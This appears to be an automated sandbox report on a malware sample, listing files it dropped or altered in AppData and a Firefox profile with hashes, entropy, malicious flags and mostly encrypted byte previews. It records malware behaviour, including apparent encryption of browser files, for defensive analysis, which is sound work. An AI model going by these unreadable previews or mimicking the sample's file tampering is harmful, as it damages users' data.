                                                                                                                          Preview:{"RecZ..W....m_...^.W.....+.DCr......$W....zz.3.......i.CNZb_Fb...d.....3L.&.K...i.. .c... B..,..Mf.s.....pd.EBP.lR..raKN...".j..sm.).]..3[......Q..N.$......*k..8 6.))_.d..i....cw.n...0.0.....1.T>.F2...,j...5..5.....8.9..@...}C..@gXy.<...."..<g....<....@....q.{.......AVl<...Q!.....?S...Zs.Hx.....=...../-G.g.....gg.G..Qfa..[...H.P..7..i....$'...C..cF.q}........ZR..`.k."..7..y.?...Ko...R...?.........#.#.) .z.....9....aM?....._'H\Zk.}?.../...+....m.+.&.t_/....-.3..g..#.....1.@:.V...Ee3.I..;a..U.:.3..m\_".J.... {.....?.-..Wa......./.M..f.Y.5k.....-^......q.'..[....5A@....,..37.|.n.\..,!E......@*'...e.@.. >R..7........3^..0.Ps:....&.......qp.0sP...7...M..p.Jw1....c.k........D....sC.........1..w......We.....'P.........!...Kf.X.g...Vc+54....f...V..B.^.{.....\...U..].;.m......vT..z.....|.{.c$...m..a....+.j...,^"..<.9...P{.0.....k....0...$.{.3....n.$......c..Y`..5V|..*..n.u{.J/7.R5.^D....>.#.n. ....PS...,...H_..'.o(0.6..w.(.U.[..;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):426
                                                                                                                          Entropy (8bit):4.744298235175777
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YZOXwpHEx6uAsBzdI/p3dI/pa33m7c2JSydz:YRHDZsvIjIsm42cydz
                                                                                                                          MD5:3FD05BEBE937C6D38A614D550586B827
                                                                                                                          SHA1:BF15F4611FDD30BC069DA19CE112873F69AD8BB5
                                                                                                                          SHA-256:F557051F4896C7EAF811760F0FCE91A9B6CDB4579C73DE27F878DB143C95B274
                                                                                                                          SHA-512:788B974B89F6311EA7EE03FD5EC9DF53AAE0595269478B8D0E9B8BA38EF47B0020DC0CA2A58125B7BF4145C1D110DE005E17D1A75A01B90124ABDA041CE525B6
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","region_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city":"Washington","latitude":"38.89539","longitude":"-77.039476","zip_code":"20001","time_zone":"-05:00"}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):83120
                                                                                                                          Entropy (8bit):7.997645798682083
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VzEGm+uX4qclq5c/nJB+w9N5KTV2L0aj4hUafGsdFfjPZ2wMWqdbBw9uiIaij7u:VAGm+uX4uQnJkw9bKTV2L+hvOQJPZ2wL
                                                                                                                          MD5:B6930D7936406DCB03CD6F9BEDD9E9E3
                                                                                                                          SHA1:BF8CC4543301A1ECE9440CFDD5A0F93967E50523
                                                                                                                          SHA-256:CA41C0D3CA06DEBB2F3BC2C57B6F357FA3C0E64D741965121C5DB704B7260A89
                                                                                                                          SHA-512:6F2167F144BC024AA508ACE6B28EC57710CCDFF29BBDCDDDB2E5DC7C79EDF77A15A5ECC8F4104BA8E181EC06C136BF6125031B54758299CC7150BA8217064CBD
                                                                                                                          Malicious:true
                                                                                                                          Preview:'use .}..RK[..{.a....<.bnu.^.D...(.Y..d.p;. .e....:...1.A.c.|E....m..t.Z.....S....;.D...X]..P`...3.p.+:..z4~/....bU^....a.UX.....8.}.-...%.....L.J#E..,X..S.#..eA;..S.Ya......NZ.i. fhA.un...{.....?q.....?{...G...Y...j34'#..G.L.f$...sc..5Rp.iH.O...'.)#.%....qx..4.7y....~...s.(.J..j;m_|S......F....5..3.pUp..1.C-o':.0Zt^.I.........k<.y."...Q,.........U8.m..Nd.....dW.ox.\.M0...S._..5.....T.y ......v.m.......=.O.u.H......C.T..5.a.......(.>x..v..;..0...u=........<. .B..A.)h$.8....7.f.i.E,y..).....{0.;....cPt.._......y...J...:....6..z..r...Ig..l..&....L...*.o7..HN..4.7.\....P.m..D..h..!.6.Fm.;.Y.......th...?H.#j.k..$#.3...e./hPjAnVD..O0i...c...d.zN..U...6.61..>J.*'..Z2...N :.'.(..+.69.v......]u.+......#*Q....:..`.R..F....(.8....S.d.X..&O.)..-..~b..B..6.m...v....z.......J.qh.(..G..yU.lP;...s.....0.u.k..f.^h}...9Z.C...w..`C.*.PVD......g"..O6.z.Q\...L].lR|:..S2..qSO.Wo;0.........i...,..4.jr..h.nx...Z..{ha....Z;...}......X4.0.W.?}.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):31496
                                                                                                                          Entropy (8bit):7.994123191462846
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:TrIctfk0ifHJxjy40aW2aZSup70vFy1AXGA6aP:Tr5V/iDj0P2aZrS4AWlaP
                                                                                                                          MD5:EF3E67BEE6B3C4D5E4D22E3465BF337E
                                                                                                                          SHA1:7C5728F96FE4A04B8AA06C690BB13D0748588945
                                                                                                                          SHA-256:088900C193C4024D08911A489B9EE9A695E81E6AF9FC48DE87A3C99C18B05C09
                                                                                                                          SHA-512:DBD123829FBEA028F4A3B3652FCAC7A13B0E15691F521413087A225717B2FBF646757282D15BF46E377144A7C68665E7480ED37F1E9281DA61E125D73C283546
                                                                                                                          Malicious:true
                                                                                                                          Preview:'use .q.V.&.....B@g.f..V.eCBo.9+..gZ.&...T..55..p.s..<....V..n.F...>}...$eG....C..|K;....a.@.3^..4.`92..SS2..4ley}.%..B.7G...s.w..k.......NU.N.Am..../..o.F....rE"i...,RW~..O5.{..,au.%g'.t..OSi.D%.w]...Ux.,.....d{C.%.m7eQ..BB$.............;`..yZ....K(H..J..U*...aV.r......9.E..T......0Y...t?..M....H..1.5......6F...h.&E.PB...^..]........H...P....|...&....n...3.m...w^......K...d.U|.M.B.Q6.[.:..I...kZ.1.*e.A.^........_...DE...JdF.*./0.".....(..f%.!.uH.".(We.....!U.C....J..{.....=.)\...hG...`P.l.<.....K.r...Ht..dr.Xu.......j...9..h|o..`..6.l2...Y.M9.V....!....g0.V3<...'..O....c......ySi..Wx..y).....OZ}.....]........6_l.O8.[._..d.\\j.c.g.).*.....G....(y..._c.....T.n4.k.......3. .&.....x.k....9JFq.B./..o....W....R..[..$...2....*...H.i.4%&...k...M.(x.....!P.u.o>#.......m.o.LVt..\...6...n2.6..jb.:.B.;.|..1P^...T$c.~.#qn...g....wu..I^...*#...........1...D!.Zb.....d.j.....wOv...gR^...q.W&.;`s.d.f_^...w.Rx;...zS....4...o.]..g.....< .b..Q...EWQ.o.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20346
                                                                                                                          Entropy (8bit):7.990491895490427
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:384:THkwrkKsSNleucOdXf9+rq+PS6YJJG2HL+ZXS4nNSrRETDBjc3PP3:Tr5PNlhcOBf9WSQcL+9S4KyDBjcfP3
                                                                                                                          MD5:275FEDDDE24E67AC17E0E0734AC091FA
                                                                                                                          SHA1:7DD924D14F40907484A53BD9FDA1BEF8DD199D68
                                                                                                                          SHA-256:27829FD727017E7DBED9107A0C94629AF9CB753796D13DE7FBF0F9856EA6FA98
                                                                                                                          SHA-512:8DA7D0EF596FE428A609969C8228EE100E0949ACE96F097CDCDFD690B44B57D18C176AA89303E3F0754ABBAC5AA9596D77BD2EF2406F93020214A16FF493DBAB
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......+..#}[..,.!.Ksz.^...{.F..{^.....6$#.....l.5......9..3c:.T.p.....;...:;?C.|..q E....`....T.q.\..5.KI.M\.y].|O.j....h...z..o^?..5...T.....E.9...VZ..*.t.V.....%..7..[7...B..........{..Z...`e".!...u..{6.......+..,.b..[...^..]K..M.m#gz....Z......<...6O|.E..wT.#..a,.....;FVa..n..F.W.A..G.1'........uc..p..c_..6.q...xw..e..~.f{/.....z..,..z\g...@u...t. ..33.lA.....{i.....M..$...8r0.u......J<~:d.'.....mj/kU......_..<......c...8{N6..r........e.^.W.*......>..[..A.u...l....k.z.....9F.C[..pm....c........./<}.@.X>..... ....&n.n.=....;.F*...p.."."\_$+LA&Tm...Y.k.u....cdF..w.d3.OY.?...k.O..Xmzh,..]\....j.}..d..}.~..`b......O#.W.[F.:`NP.01dX_.,...c... ..]..NG..Cl6i..0..jd.....O~.q.#..s.....o.Vy^]3./.....-]fg..-s..J..WN7)....v.....Pn.r{^z...4.+)22}.I.....&...Y.....[...?........p.r.......f....U.za..K......>.N.z......KS.]!'m......Y...^..!. .".$B..F.....c.1...#>e.7...0..$...N[.d....u.$ICl....a|..].:....x\.....ab.LM......F..Hl..Z....N1r$..7.J=y..{M

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\activity-stream.discovery_stream.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1583
                                                                                                                          Entropy (8bit):7.859110795559383
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YtAQ4VWQpfetE2KNPHdXIY01IUbEdXxWx+LD:RQ44W2tEhNBI71Irn
                                                                                                                          MD5:065DB74A747FEC2A2FE50083635BB341
                                                                                                                          SHA1:F2C1CB228BC3F9E407CA07F3E4F6FA92BA37EF8B
                                                                                                                          SHA-256:C2E9B8206FE94F45F6BA33D075452738D814F72BF78BA2B6231944577198F9E7
                                                                                                                          SHA-512:061A3B6EE545B0307E9BB7A0C64DF2477E239A159AE7F56EB2A8D4097116C690A2E5A479B16B09B48B98BCFD6403C8F11BB918FE28BDB06BCDD7E07337C37FC7
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"spo^E.[7..L.)..X...Y..."|...1u.#.D%G...X.k..dU3...~b.N..|..#..-b..2.HGsd...C.mg..~mN..md.Sy.Xd...*.7.....O..yN.[D..K.o.u...z..3.q.E....T......c=.U.H.mg2.6.....]pk.[.......C..@'A.Z..E..h..c....../k.S.!.B:....R........".V..'...N.8H.*..oUR..?.(...$.i..}$6g....T....7...0N....q..C..P....yM. k.>...QO~....../:.v7T..yf>.(......y3o.......3....Y..f......^L..........$].......7.<.....g....C..$v.S..l..G.!.^A.z....-x.(3b.<..f.....qe..V....z~]......:..v.A.X].i}.i...)....?..d.dM.....9.`.8.-'y..... ..v@l.X...I....x.7.z........k....6.E.J.Y"..V.....k...WW.c..P..\..X.?....f...Q..&..D..&q.. ...V..Go...^b.\h..k6.....g.\......C...S....~.b...z.....@.!L..TL>.m..5...`....1..4B....IS.Is&..$.. ....>.a$.U...r.H.C...j......g..~g.....g........%..o......&..S.f.x........&(..../.%.pc...@..........A..P....&...b...jUD.f.6.2.=.K6....(.}<.T...$~7V=p..m.g..V...h...Z...&~..v6.{..S.qF&.2..T..pV.O.....[..06..o.....M..k.0..!&.Y>[ "'Q.w..4+".=..C..". .WnHmc..r....:.i.$.....q....].~..7

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):7915
                                                                                                                          Entropy (8bit):7.97994954626265
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:7MapOqV5iovia6oay/vTwtDI/Hy1yWXJh7cHoE9MydWffvsPoKq83C4h/uXbhsjT:7M4OIio1vq1JXJh4H9MyqeFy4heOjiw
                                                                                                                          MD5:2A4AF6F5908381CBC3F09CFEE57A3900
                                                                                                                          SHA1:C20D5DDDECAC955963FA0FB70F020FE8F1788D69
                                                                                                                          SHA-256:D93BC7B1390E64BFE0F82542DC37327EB5BAFA7C33D3C3149D39B4AE173377E4
                                                                                                                          SHA-512:E2BDC475198C355044C5816334FE2BE24E807E9FD9CF8CFB1608AF59085E46488E4AEEF6DC36B2A17F4DC2C9B1D3A5A99E2A648B13BE4743DD10607C7CD704D4
                                                                                                                          Malicious:false
                                                                                                                          Preview:# ThiV.|..G... [.:T..e[...1vg6.~....`..Xt.@...@.Q.A..w..V.f.....Y>..w.WA..8kuR....).;.b."....q=.G&xsl.........f.t.Q.q..[f.Ef...h.W...r.;.l/BBA..;<.Y..X.....Q0f.....B2wY.:7{........T|.e...A..4....8<.B.R.w\i.`..,..."A....k..2....2.&.e._.l....k.P.....~....]....Fd...{*z?.^H.......6...Au.P6..`.e?x'.......f@.&.:......!Z.<.....3J...A......v9.I...v.og.'2....M.2..?[..!..g...n.e.........T...../.=To-Ww.G9.%'..o...E.9M.l..,_qty[.F..[Y....r".{....=....zK8.h.p...Q.i8..i,... ..5$.j`...mR.$.K..>\.A%.......d&..J|.r+... .]]{....n.0.`.~.C..B.>d.Xo.s.. ..:.a.....0.-.....H.bD........}....9UT....p....vZ..fs....5...s.L.A4..fM.......J....z......Y..~....v....%.C..%.Z..tS.h'.k..._...8_.x.G8hk...g.P0d..I@....T..bD,.=.0..p...W.....E4a......=...R.Xm...y."...A4.;@.rQ.7.......)BUE.N..t....}..h...!....bC.+s.;.oZ-@... M.NUa...i..i.F/.'...]?Z.....6@.#eFTrt..TH.:.M.0\..h.....q._.b.xlF.Q.g....O.b....>.~.....#.... .._jW.t..:.#=k..8u....r..U.4....rW\"...&s.r;..)..x.w.T

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2046434
                                                                                                                          Entropy (8bit):5.076161946797978
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:XozIYN389J9ibnXbC4xqcGG487l/bpO7oypPA1OEiCIuRhRuPoCnE2ZzNYLQhhWi:uXUcGGR7l/bqs6BjUNR+z
                                                                                                                          MD5:D82F2BFDDBC6D27E1BCC465F53539FBB
                                                                                                                          SHA1:C32DA16267D15A6BAB7168DD55B5801642692436
                                                                                                                          SHA-256:933E6325EE2BF27EDE7B25F0EC33B09EF184033CFFC22090B536D09A24CF1A62
                                                                                                                          SHA-512:3ED2449AC78D3552CDBE63E0A1D0ABBADA5069B900955204C2A524466FF2B49B125AF3C2E9FC21EB5E14B1D628D1FE9619174550734C97861D947FD6BCBC2C4B
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozXDH.%|.6Q.i'...a...]PY.l.@.F..h<.......mP.....G\..z.j.........../.@.CX?e..._...0.....R.&Z..G.....9.R2.-..R)..y.[..."-.2..O....d..i.M........$.5..@...8Q.d.P$.A...K.<.....+..t..>7m.AU.i:.E.)..\_r.l..N.&&..jYkP..-.V...Hf...N..6.9.s.%...NEy-..41...3|M.5+j<..z.....x_x>p4..u..e..C).J.p._u....:..Y.....I.!Q1.\..1..mKA..|U....(..!...{.o)...s.5.8..:{...E.+YB...y.W...]....4..(9..ck.#.A..?...Bw.....8j....u.e.....^....4..,'...E\!..O..P..T......[J!..../)/.`P..M_.....A._.???/.~.O...<...3C...@..X.tq.0x..hi|x....E......S...6.....S..R.......J]?|........e..:.....q..#.M.}&^7N.R?7_.<~.[]..1mW?...]m&./.'?C..In.t.2...E../4m.HY....G0..`*v.yZ q....A...z..K........99....Q.*...e ......&05.....},X.1r.\.{.j..=.%.H.faO. .Z.V.lt.Q.>...".J.....3....)..uy...n...X......~.5.2"iKM.f.o..:....).........1...]....N...H...Q...f>6.g.0D.Sd...:yT..1.O.r......V....{.j.a......v...!.......A]..2..|.2KL..I.l....,`.....{.k.1...I|.w.'.MUP..].."9;Lv.=...........r...H..n..|...

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-current.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8387278
                                                                                                                          Entropy (8bit):4.8026448178653895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:gtwTv3Dxd4C4sWDc+ikpXGGRAuAgdyR+FwDkly0CNG1Kl/S/qyal+6N7hS5BLVnA:Vv8EW5IdVgdy6gn/SSyal+rPO
                                                                                                                          MD5:5BCC149D6FF3DC24801988B0738410FA
                                                                                                                          SHA1:AE456156ABEC95C9C53FD29F8AF8756A88AB9A04
                                                                                                                          SHA-256:95EA343D963EC5C7A9C939E9319EE2A14E190A5AAF55682E1E9D8C5AB557A4F5
                                                                                                                          SHA-512:1C73FC6E3179D0A69094D2FEE362B5106921603269242620FDA46ECEF8B66EFDCF8957C46EB05B11D3C060118750D7DF19BB39BD98D75E095774AC267FED9AE1
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozXDU.m..&.(.J~..8........X.....r.....?....$.2....f....\.q.~..R.i.:d.....o.)..1ez`...|q>V.b.M.B.W..+<l"e....p2!..^.s.........I.4.M.wg....h..BA.HOx...H+..g.w<...3{......3.I........W.......-|QZ.~.p...\.P.<.1ry.e..s...~....xB>..K..]....Mnt<.Z..81.IH.....i.f:.I@.X..f.Q.D.....zFhY;a'.Cv...}2g...F.V.+.H......~H...H~.[dc...De.....^e6:..`.Q.1../X.X..}.siy}.....^.,g......x:.......v.~..2.........9 #..x.. ......fb...h.:...}x.....X.ax#bZ#Q..].g....E.:.ay....w(.g&.L.|/........?..5..dK.Pv..u~O...^1.{+L..@T.!,!0.S).9.DX...}d......o.D..ilJ.Z....,Uy!i.c...Ub....'...*.'2. ...I.+?Q.V&......".=5.E...V>.W........aO]........0.Q......c.E.=J..U}I.@M..w....Y4..x...E.qk.8.'..........s..2..!.5.\...6A..Z.Jw.L.2...U....0.93.$1..u.JR...[j.$.j..7]....N...N..T.V.Qe.Yy.e.M.)Vo...S.l%'...$.M.i% ^.&A..jTj_V........m....O..t..L.h~....g.u.7N(/.!Q.`..p...^. ...BZ.c`K.Q..C....@L...d+..Y;H.9]o.....@.%...8;4R.....E..<6(g.9<..m}......Y.._..p.........ys}mj-...N....o..o(.Au.Y.

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\startupCache.8.little

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2620287
                                                                                                                          Entropy (8bit):6.998658434452679
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:pPmCVqEY2M9Ooj6HoMllbQkvFLqLhjYOC5QSbs9fmadKzz/we3qR3omqfkXIzyUX:peoqoM99IrJxEhfSI9CyYlNjcHu/EkZ
                                                                                                                          MD5:A3A512F661CD936B10AD2136694E410E
                                                                                                                          SHA1:44FF7D867680DA809CED18254D3250BA09A4659A
                                                                                                                          SHA-256:33A7626F4C8593BB31BA493DFD64D3E18F511FB4816B233427CCA749A9351800
                                                                                                                          SHA-512:66D418E8339D882894665C70D62D60334E5C02060388B1C16B57D2730805BA23B42E5F8E75C09BA45BA20BDE048921C63BE0D2C6DDDA557F19ECD2A0B1A23DFF
                                                                                                                          Malicious:false
                                                                                                                          Preview:start]....3.......J..it..I6.....d_..ot..I...*|H..B./...'..e.6....X....lM.9..#d7.V\U.....js.(..X.Cj.....X.....}H..H.t.Dh.f..=...u.,>z.E+.c........d....\.2...S.c-..m..e.....s.?.&a..:A.........XLb.......j..pv...~.aF..u..w.... W3.\Y.(...1....e..Xk.G.D....,/..\5.?.."..L.DqK<*\...q$...9.^......../....r&..B..9<.z.Q......'.VQ$.QviF./...{E..."U...1.W....7.ZV.N.Xl.T0..G#%<.&.,....>..Oq,.s.....b.6`.....!p.-......yt[.....{|..b...7/...t..V.3.S%.U.8S....,GzQ qc...U..RX1....F.%..[Z..$dt.=n.&y.J..^.ku1....m...u.Q..Sk..d..."......?.....L..b.*..=...<H|....B.lB.....F[>~.......S.3.|.Q..A.....c~..d..c.6......"6QK...b.....=O.)C.?.z.G....~.n....,..5......2.S...{.D.Zi.....{#?n.0..b.n......$......c.8.z2Mf..".n...a.c._<y.q..7.'.....1.........R..+...W...&...#.x.GB\a..tR...P..=..W0..6@....610...*.n....xM..."\....<z.J..w.VU.....W..).t.O.$F{JeE.......>.......:*7.'.G{.}N...)E?....W@.@.P..}..^akx.f...R.T._,.m~..X.s.........\o/UN.#.Y.....pv..p.RV..........?..M~..xq%.(.u&..

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache-current.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2983
                                                                                                                          Entropy (8bit):7.947450699485163
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:tySNaMxja+VDbO+IxJn6JLFfpD8aMl0472UhO1ZO94qDEP+Daw0ZUKny7VD:wkaq9nO+y6FFGK4a/sCNPSFKny7t
                                                                                                                          MD5:DFBFA7A85A0036A220B13A52674D5838
                                                                                                                          SHA1:60FE418D82D08E838BC44CC20D293A364596382A
                                                                                                                          SHA-256:05A2885FA61F67BD552AC29FBE4C9D7D1959B54B1054654EAF5086EC809481D6
                                                                                                                          SHA-512:40B2347246CA4EB0F07E2C6CD88DB2900B7762AD459ADD1F7870F33B5162B730009DE8F61DCB8112DCBE7D063056667CCF9CEF96F52AF040021F9F3548F60C31
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozUR.C|.{...y....;.....;.a.T....g.X........_...{.9ftN......+.C....j_jZh.eGZ...d..m.%r..}...s.+....c.Z........E~.#.j.T.N).....p....*Wj|.;.[E..&L...V..#.l{.i...[S........W.T..IZX..?.........#.L}..).k...N...'...1...mu...}K.n......-..Y.7"g......+....Oh"c...S.u..x....].[........\...[.....|....m..i....r+.P.K..o....s@E].9b.D]..A?.....mMe.Q.U.Q....&.E.Y.../\.3..V`.;......1#KC.....eC.+!.h..^V..Y...;....._=..Q^.{....,...h.K].Z6...-.e.....?7.[....k..z. ..T2..=j.7.d8.Y...zy...J.....".3t....v.........5....\l.~...6.....+.....6.Q..F.it.Ai....o.S$.x0.W.mU(..NlB.....|.a.t!.H,.C..Q.......B....jt.1"~.................^.v. ....Y.n...1.z..O.X.....].5C.Yx.%...1.@.....zc@DKn.....z...r.i...h...v..EQ./.p......ZnE.Wz.m>..u_....L..D........(.I..T...O]g,.....]....)<.......L.....M....[.-....Iz2.......H..D.3..*..c...k.:........c.D..K0.;..&.[.>.jI.RLs.o..o.xb.:.U.......>...ZN.../...t%....G..f..A.(.C.Z....i.bIc..gD..'.U.........o.O..u..)...T...D..,...U....(..:.K.y ..'W.|=.

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3739
                                                                                                                          Entropy (8bit):7.954974768340393
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:pKXblVpAfmVEsyUzbjQ25Jxg+GK12TkjtuQ1:QrlVpAmjyU37PxWYOQ
                                                                                                                          MD5:4577E40D6A08DDEC4E3BAA66C41E82BE
                                                                                                                          SHA1:110838C27DD81E6FEF30AA7B1BD12D2D8E369A2D
                                                                                                                          SHA-256:2B023109D1DEC27A106DDD254CFD0550205E45B405CC81F184DACAF8DD803527
                                                                                                                          SHA-512:5670FE5AA7B20459F9CBB9057605D0B7416C04EC07E270879ACDD9697D959D739194FEFB6F82D6CD93E52FE57AD2F9FCCEB0492B916103CCB6DFBF0D36104175
                                                                                                                          Malicious:false
                                                                                                                          Preview:mozURn..4T...%i..3..q.}$....M.P]l......\X...P.......x)......w..x.cS.........XG.#.>.N....+.(.c.#.*.>.@[vYq...0..s&.\HWp......B2.u..L.T^3.~...ot.$.H9.t.J.~.m.0u....FLa%..5.z;.?s.........JN_?..(.XZ..eF<...K.=.....+.CG....'/.CX)......v.G.W,.p.J..(a0yQ..j..x.....`...fz.de.s.]..E..T.&.....-.E/....b.".Ib.?.........bswk.fF@i...".'.L.w.7.1e............uR...#9..:B3O.&.:.XR........"...<.........gb.s.T......nH..L....^r{E^.\Hz5.G...Y.;+....7.m...f.......jl..k.v$I.|#era2.R.?.7...+h#.t<.&../...Ag....C..Q.* 4."L`.....\..I.H4R`..-C?..v.u..L.....i...W...KO.3,.-Ca.$.._i.1.....I6.yJ.......=...\.).v..J....Z)....p...R.....-...G....)E/.n..VQj.....(.....F.x..@`.....Nf...87/.E.g.t_.5.....&.d.l?....%...SC.+.......L..D+..X...yf.....`|2.G.c.z..#...lrER...4.|........3....Rz8.=.7.b..Xn..L......~.H.\....kY..G"....v.b..-o.......S...IW]d...,^....w.....QQ.20k.xj.D!l."Di...8.m.?~......x....K.5.I....^...q..)d...na.h..Q...2y6`.*ZM..=L...~;@..M.3.Y^..Vvf.....RD...d..

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):110692
                                                                                                                          Entropy (8bit):7.998197383497736
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:tS4BP9sEm4jdIT51H0R1Ttntf333IqTzITa/ivC0UA:t3BP9Tm4jdITURVTrzzOAA
                                                                                                                          MD5:15EA5E9F1D84A41296776D86C7715C33
                                                                                                                          SHA1:79E61443B15600C461EF8DF75D28D50AE5B935B8
                                                                                                                          SHA-256:E5F0D1F59D0FA3834224032D7BD55FE6BE8F7C8BCA03065527146280C50ABD6D
                                                                                                                          SHA-512:73D205A033AA97C48BC8BAEF41C5F85AD4078079130FFAF834A67981895F1A079AA8C9F3C119C17ACB1AB930D9B925F031E9870810B53E53F34D3CD0DF530888
                                                                                                                          Malicious:true
                                                                                                                          Preview:mozJSN......aU.....(..C.6.2....EB.r."[..qh.%.N..J.0."q....%.f.z~..:TL.^Ia..O.4.kq..js(..V.<.t..i....g$.Urk.=.6.vW@.~..,e...l.G..mw.XIA.Z.....F.....#.h.C..>....7C.~...5.".nz6#..Uk..8.....P}.W.j.).?..~.-......OsS.z.......K..Y...5v.y.>...."w.....:.........;.....].G.1.j.....<..l...Zx.).....u..[.....G@.,.[5...R...a.Q...M.Rx.q...}m.x..4...k.S.....6D...]...z.+....5........9.!.....[$.. $..z.$0..n..J}7..E...:.![..y.6g7!:.mU".\..d..|V.0K.......`.^...|.T_v._...1n...V,.w...../.Ni.g..O..p.2.>V...s1..P.yg..N*..+.=....&..h;H.-h.g.4.(....t#.'......}6...>...z...w..7....l5.h....H..5....x.E....G]..}.c./...Q....9....V...R...aw...f.....q.k..:...Mx.!p%..g$g#/.[1....5.VaEY%.W..)..v......M......>.-.>..E,.L....:.....,......J.b*IK....,d..r-Qz,Oz.S....h.2.....\........0....5...&....&..Bh..q..n.v......*.....+o..:..<.!..9 ..]...L....[n.......pk...r...$......tP...B".;...A..........$m.d.w..?yU.....{..HZ....?..............?4.@..R.B..i]M.x.r.....<.=uQ.n1d..H..e..i......,...

